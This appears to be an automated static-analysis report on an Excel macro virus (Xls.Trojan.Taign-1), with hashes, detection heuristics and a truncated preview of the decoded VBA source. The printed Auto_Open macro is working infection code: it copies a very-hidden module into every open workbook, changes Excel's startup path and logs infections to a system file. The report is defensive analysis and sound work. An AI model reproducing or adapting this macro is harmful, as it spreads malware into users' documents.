Xls.Trojan.Taign-1 — Office (OLE) malware analysis

Static analysis result for SHA-256 e9530b534517a351…

MALICIOUS

Office (OLE)

30.5 KB Created: 1996-10-14 23:33:28 Authoring application: Microsoft Excel First seen: 2012-06-14
MD5: 3b4bb30fbbe01f7689a94566939c3a9e SHA-1: c77699d149ba877d733a3d927c05b387c8c58330 SHA-256: e9530b534517a3513e65efa32abb4e0f5b407e4d953012bf7b5c2c171b814229
220 Risk Score

Malware Insights

Xls.Trojan.Taign-1 · confidence 95%

MITRE ATT&CK
T1059.005 Visual Basic

The file is identified as malicious by ClamAV with the signature Xls.Trojan.Taign-1. It contains Auto_Open and Auto_Close VBA macros, indicating it attempts to execute code upon opening and closing. The macros create directories C:\MSOFFICE and C:\MSOFFICE\EXCEL, suggesting preparation for downloading and executing a second-stage payload.

Heuristics 4

  • ClamAV: Xls.Trojan.Taign-1 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Trojan.Taign-1
  • VBA macros detected medium 2 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Auto_Open macro high OLE_VBA_AUTO
    Auto_Open macro
  • Auto_Close macro high OLE_VBA_AUTOCLOSE
    Auto_Close macro

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 29968 bytes
SHA-256: 5b4ad008ce4bb60f559b3422465c18d75c92fc30539fe2f5e6224bd9847bb829
Detection
ClamAV: Xls.Trojan.Taign-1
Obfuscation or payload: unlikely
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet2"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Sheet3"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True

Attribute VB_Name = "Module1"




























































































































































































































Public closed
Sub Auto_Open()
Application.ScreenUpdating = False
Application.DisplayAlerts = False
On Error GoTo Err
If Dir("C:\MSOFFICE", vbDirectory) = "" Then MkDir "C:\MSOFFICE"
If Dir("C:\MSOFFICE\EXCEL", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL"
If Dir("C:\MSOFFICE\EXCEL\XLSTART", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL\XLSTART"
If Dir("C:\MSOFFICE\EXCEL\XLSTART\ALT", vbDirectory) = "" Then MkDir "C:\MSOFFICE\EXCEL\XLSTART\ALT"
Application.AltStartupPath = "C:\MSOFFICE\EXCEL\XLSTART\ALT\"
Application.OnSheetActivate = ""
Application.OnWindow = ""
If TypeName(Application.Caller) = "String" Then
For c = 1 To Len(Application.Caller)
If Mid(Application.Caller, c, 1) = "[" Then start = c + 1
If Mid(Application.Caller, c, 1) = "]" Then Length = c - start
Next c
If start = 0 Then
Source = Application.Caller
Else
Source = Mid(Application.Caller, start, Length)
End If
issrcVisible = Workbooks(Source).Windows(1).Visible
activewb = ActiveWorkbook.Name
selectsh = ActiveSheet.Name
PersExist = 0
For wb = 1 To Application.Workbooks.Count
If (Workbooks(wb).Name = "PERSONAL.XLS") Then PersExist = wb
exist = 0
For sh = 1 To Workbooks(wb).Modules.Count
If Workbooks(wb).Modules(sh).Name = " " Then
exist = 1
If Workbooks(wb).Modules(sh).Visible = True And Workbooks(wb).Windows(1).Visible = True And Workbooks(wb).ProtectWindows = False Then Workbooks(wb).Modules(sh).Visible = False
End If
Next sh
If exist = 0 And Workbooks(wb).ProtectWindows = False And Workbooks(wb).ReadOnly = False Then
Workbooks(Source).Windows(1).Visible = True
Workbooks(Source).Modules(" ").Visible = True
iswbSaved = Workbooks(wb).Saved
iswbVisible = Workbooks(wb).Windows(1).Visible
Workbooks(wb).Windows(1).Visible = True
If Workbooks(wb).Modules.Count >= 1 Then
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).Modules(1)
ElseIf Workbooks(wb).DialogSheets.Count >= 1 Then
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).DialogSheets(1)
Else
Workbooks(Source).Modules(" ").Copy before:=Workbooks(wb).Worksheets(1)
End If
Workbooks(wb).Modules(" ").Visible = xlVeryHidden
Workbooks(wb).Windows(1).Visible = iswbVisible
Workbooks(Source).Modules(" ").Visible = False
Workbooks(Source).Windows(1).Visible = issrcVisible
If iswbSaved = True Then Workbooks(wb).Save
End If
Open "c:\windows\system\info.doc" For Append As #1
Print #1, Time$ & "," & Date$ & "," & Workbooks(Source).Path & "\" & Workbooks(Source).Name & "," & Workbooks(wb).Path & "\" & Workbooks(wb).Name
Close
Next wb
If PersExist <>
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.